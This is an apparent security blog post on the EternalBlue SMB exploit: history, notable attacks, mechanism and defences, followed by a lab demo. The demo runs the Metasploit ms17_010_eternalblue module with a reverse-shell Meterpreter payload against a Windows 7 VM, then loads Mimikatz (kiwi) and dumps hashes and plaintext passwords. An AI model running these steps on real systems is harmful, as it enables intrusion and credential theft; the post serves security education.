Home Hacking Hacking Tools // EternalBlue – Exploit & Analysis (Extract passwords with Mimikatz)

// EternalBlue – Exploit & Analysis (Extract passwords with Mimikatz)

In 2017, the world witnessed the destructive power of EternalBlue, an exploit that leveraged a critical flaw in Microsoft’s SMB protocol. Originating from the NSA’s cyber arsenal, EternalBlue became a tool for chaos in the hands of cybercriminals. Discover how this exploit works, the major attacks it fueled, and the lessons it taught the cybersecurity community.

@wirepost

06/07/2024

202

In the realm of cybersecurity, EternalBlue stands as a stark reminder of the vulnerabilities that can exist within even the most robust systems. This exploit, developed by the National Security Agency (NSA), has been responsible for some of the most significant cyberattacks in recent history. Will get into what EternalBlue is, its origins, how it has been used, and the implications of its continued existence.

What is EternalBlue?

EternalBlue is an exploit that takes advantage of a vulnerability in Microsoft’s Server Message Block (SMB) protocol. SMB is a network file sharing protocol that allows applications and users to read and write to files and request services from server programs in a computer network. The vulnerability, known as CVE-2017-0144, exists in the way SMBv1 handles certain requests, allowing attackers to execute arbitrary code on the target machine.

The Origins of EternalBlue

The creation of EternalBlue can be traced back to the NSA, which developed it as part of its cyber arsenal. This exploit was designed to penetrate Windows systems, allowing the agency to conduct espionage and gather intelligence. However, the existence of EternalBlue was not publicly known until a group called the Shadow Brokers released a trove of NSA hacking tools in April 2017. Among these tools was EternalBlue, and its release marked the beginning of its widespread misuse.

Notable Attacks Using EternalBlue

WannaCry Ransomware Attack:
Perhaps the most infamous use of EternalBlue was in the WannaCry ransomware attack in May 2017. This attack affected hundreds of thousands of computers across 150 countries, including critical infrastructure such as hospitals, telecommunications, and transportation. WannaCry encrypted users’ files and demanded a ransom payment in Bitcoin to decrypt them. The rapid spread of WannaCry highlighted the devastating potential of EternalBlue.
NotPetya Attack:
Following WannaCry, the NotPetya attack in June 2017 also leveraged EternalBlue. NotPetya initially appeared to be ransomware but was, in fact, a wiper designed to destroy data. This attack primarily targeted Ukrainian organizations but spread globally, causing billions of dollars in damages.
EternalRocks:
Unlike the previously mentioned attacks, EternalRocks is a worm that utilizes not just EternalBlue but six other NSA exploits. Discovered in May 2017, EternalRocks demonstrated the potential for more complex and damaging attacks using the leaked NSA tools.

How EternalBlue Works

To understand how EternalBlue works, it’s important to get into the technical details of the SMB vulnerability it exploits. When EternalBlue targets a system, it sends specially crafted packets to the SMBv1 service running on the target machine. These packets exploit the buffer overflow vulnerability, allowing the attacker to execute arbitrary code. This code execution can lead to various malicious activities, such as installing ransomware or other malware, creating backdoors, or taking control of the system.

Here’s a simplified step-by-step breakdown of the EternalBlue exploitation process:

Scanning: The attacker scans a network to identify computers running vulnerable versions of SMB.
Payload Delivery: Once a target is identified, the attacker sends specially crafted SMB packets to exploit the buffer overflow vulnerability.
Code Execution: The exploit allows the attacker to execute arbitrary code on the target machine.
Post-Exploitation: After gaining control, the attacker can deploy further payloads, such as ransomware, additional malware, or use the compromised machine to launch attacks on other systems.

How to Use EternalBlue

Using EternalBlue, especially for malicious purposes, is illegal and unethical. However, understanding its mechanics is crucial for defensive purposes. Here’s how cybersecurity professionals might use EternalBlue in a controlled, ethical manner:

Penetration Testing: Security experts use EternalBlue in penetration testing to identify vulnerable systems within an organization. This helps in assessing the security posture and readiness against such exploits.
Training and Education: Cybersecurity training programs often include modules on EternalBlue to educate professionals about its workings and how to defend against it.
Research and Development: Researchers study EternalBlue to develop better security measures, such as more effective intrusion detection systems and patch management strategies.

Defending Against EternalBlue

The most effective defense against EternalBlue is to ensure that all systems are updated with the latest security patches. Microsoft released a patch (MS17-010) in March 2017 to address the SMB vulnerability exploited by EternalBlue. Here are additional steps to bolster defenses:

Disable SMBv1: Since SMBv1 is an outdated protocol with known vulnerabilities, it should be disabled if not required.
Network Segmentation: Implementing network segmentation can prevent the spread of malware within an organization.
Intrusion Detection Systems (IDS): Deploying IDS can help detect and respond to suspicious activities associated with EternalBlue.
Regular Security Audits: Conducting regular security audits ensures that vulnerabilities are identified and mitigated promptly.

Demo Time

Disclaimer: For this demonstration, I am using a Windows 7 machine running on VirtualBox, which is specifically vulnerable and configured for this demo in a closed network environment. Do not attempt this on unauthorized machines.

Searchsploit is a command-line tool that allows you to search the Exploit Database (Exploit-DB) for known vulnerabilities and exploits. It is part of the Offensive Security’s Exploit Database project, which is a comprehensive archive of public exploits and corresponding vulnerable software. The tool is extremely useful for penetration testers and security researchers to quickly identify potential exploits for known vulnerabilities. For more information, you can visit the Exploit-DB website. So, we are using the searchsploit to find available EternalBlue exploits

┌──(kali㉿kali)-[~]
└─$ searchsploit eternalblue
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                              | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                          | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                    | windows_x86-64/remote/42030.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Launch Metasploit Framework – Metasploit is a popular penetration testing framework that provides tools and resources for discovering, exploiting, and validating vulnerabilities. msfconsole is the command-line interface for Metasploit.

┌──(kali㉿kali)-[~]
└─$ msfconsole              

Metasploit tip: Enable HTTP request and response logging with set HttpTrace 
true
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v6.4.15-dev                          ]
+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

Search for EternalBlue Modules in Metasploit – This command searches Metasploit for modules related to EternalBlue. The list includes exploits, auxiliary modules, and post-exploitation modules associated with the vulnerability.

msf6 > search eternalblue

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)             .                .        .      .
   29    \_ target: Neutralize implant                .                .        .      .


Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

Use the EternalBlue Exploit Module – This command selects the EternalBlue exploit module in Metasploit. The info command provides detailed information about the module, including supported targets, options, and references.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > info

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Equation Group
  Shadow Brokers
  sleepya
  Sean Dillon <[email protected]m>
  Dylan Davis <[email protected]m>
  thelightcosine
  wvu <[email protected]m>
  agalway-r7
  cdelafuente-r7
  cdelafuente-r7
  agalway-r7

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic Target
      1   Windows 7
      2   Windows Embedded Standard 7
      3   Windows Server 2008 R2
      4   Windows 8
      5   Windows 8.1
      6   Windows Server 2012
      7   Windows 10 Pro
      8   Windows 10 Enterprise Evaluation

Check supported:
  Yes

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT          445              yes       The target port (TCP)
  SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
  SMBPass                         no        (Optional) The password for the specified username
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload information:
  Space: 2000

Description:
  This module is a port of the Equation Group ETERNALBLUE exploit, part of
  the FuzzBunch toolkit released by Shadow Brokers.

  There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size
  is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a
  DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow
  is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
  completed in srvnet!SrvNetWskReceiveComplete.

  This exploit, like the original may not trigger 100% of the time, and should be
  run continuously until triggered. It seems like the pool will get hot streaks
  and need a cool down period before the shells rain in again.

  The module will attempt to use Anonymous login, by default, to authenticate to perform the
  exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use
  those instead.

  On some systems, this module may cause system instability and crashes, such as a BSOD or
  a reboot. This may be more likely with some payloads.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://nvd.nist.gov/vuln/detail/CVE-2017-0143
  https://nvd.nist.gov/vuln/detail/CVE-2017-0144
  https://nvd.nist.gov/vuln/detail/CVE-2017-0145
  https://nvd.nist.gov/vuln/detail/CVE-2017-0146
  https://nvd.nist.gov/vuln/detail/CVE-2017-0147
  https://nvd.nist.gov/vuln/detail/CVE-2017-0148
  https://github.com/RiskSense-Ops/MS17-010
  https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf
  https://www.exploit-db.com/exploits/42030

Also known as:
  ETERNALBLUE


View the full module info with the info -d command.

Show and Configure the Exploit Options –

The show options command displays the configurable parameters for the selected exploit module. Key options include:

RHOSTS: Specifies the target IP address. This is a required setting.
RPORT: The port on which the SMB service is running, defaulting to 445.
SMBDomain, SMBPass, SMBUser: Optional settings for authentication.
VERIFY_ARCH and VERIFY_TARGET: Ensure the exploit targets the correct architecture and operating system version.

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.1.124      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.1.4        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

Set the target host (RHOST). RHOST specifies the target IP address. In this step, we are setting the IP address of the machine we want to exploit.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 10.10.1.124
RHOST => 10.10.1.124

Run the Exploit – Running the exploit command initiates the attack. If successful, it opens a Meterpreter session, providing control over the target machine.

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.1.4:4444 
[*] 10.10.1.124:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.1.124:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.1.124:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.1.124:445 - The target is vulnerable.
[*] 10.10.1.124:445 - Connecting to target for exploitation.
[+] 10.10.1.124:445 - Connection established for exploitation.
[+] 10.10.1.124:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.1.124:445 - CORE raw buffer dump (40 bytes)
[*] 10.10.1.124:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 10.10.1.124:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 10.10.1.124:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1        
[+] 10.10.1.124:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.1.124:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.1.124:445 - Sending all but last fragment of exploit packet
[*] 10.10.1.124:445 - Starting non-paged pool grooming
[+] 10.10.1.124:445 - Sending SMBv2 buffers
[+] 10.10.1.124:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.1.124:445 - Sending final SMBv2 buffers.
[*] 10.10.1.124:445 - Sending last fragment of exploit packet!
[*] 10.10.1.124:445 - Receiving response from exploit packet
[+] 10.10.1.124:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.1.124:445 - Sending egg to corrupted connection.
[*] 10.10.1.124:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 10.10.1.124
[*] Meterpreter session 1 opened (10.10.1.4:4444 -> 10.10.1.124:49159) at 2024-07-05 19:47:15 -0400
[+] 10.10.1.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.1.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.1.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

Post-Exploitation – Load Mimikatz to extract credentials. Mimikatz is a tool used to extract plaintext passwords, hash, PIN code, and Kerberos tickets from memory. In Metasploit, kiwi is the extension that integrates Mimikatz functionalities.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.

Retrieve all credentials. The creds_all command extracts all available credentials from the target, providing a comprehensive view of the compromised system’s security.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain    LM                                NTLM                              SHA1
--------  ------    --                                ----                              ----
vboxuser  WINDOWS7  df5359a8e9ddd9a1944e2df489a880e4  fcfac73da7b7c9e8815c744a3ec5646b  7b3aba54f3da8ab99414fa1288043a1c26be57f7

wdigest credentials
===================

Username   Domain     Password
--------   ------     --------
(null)     (null)     (null)
WINDOWS7$  WORKGROUP  (null)
vboxuser   WINDOWS7   vboxuser

tspkg credentials
=================

Username  Domain    Password
--------  ------    --------
vboxuser  WINDOWS7  vboxuser

kerberos credentials
====================

Username   Domain     Password
--------   ------     --------
(null)     (null)     (null)
vboxuser   WINDOWS7   vboxuser
windows7$  WORKGROUP  (null)

Conclusion

EternalBlue is a potent reminder of the ongoing cat-and-mouse game between cybersecurity professionals and malicious actors. While it has been the source of significant disruption and damage, it has also driven advancements in cybersecurity practices and defenses. By understanding EternalBlue and taking proactive measures, organizations can better protect themselves against similar threats in the future.

// The OSINT Risks of Flight Ticket Barcodes: Protecting Your Privacy

// Investigating Telegram Channels for OSINT: Methods, Tools, and Ethical Considerations

// Visualizing IoT Devices with Python, Shodan, and Folium

Exposed: The Most Catastrophic Malware Ever Unleashed – Are You at Risk?

// Mastering Recon-ng: A Powerful Tool for Ethical Hackers

Lockbit Ransomware Attack on German Hospitals: A Call for Heightened Cybersecurity Measures

// Investigating Telegram Channels for OSINT: Methods, Tools, and Ethical Considerations

// How Secure is LUKS Encryption? A Comprehensive Look at Brute Force, Quantum Computing, and Real-World Security

// Cybersecurity Evaluation on Target

Facial Recognition Technology: Balancing Public Safety and Privacy

// How Secure is LUKS Encryption? A Comprehensive Look at Brute Force, Quantum Computing, and Real-World Security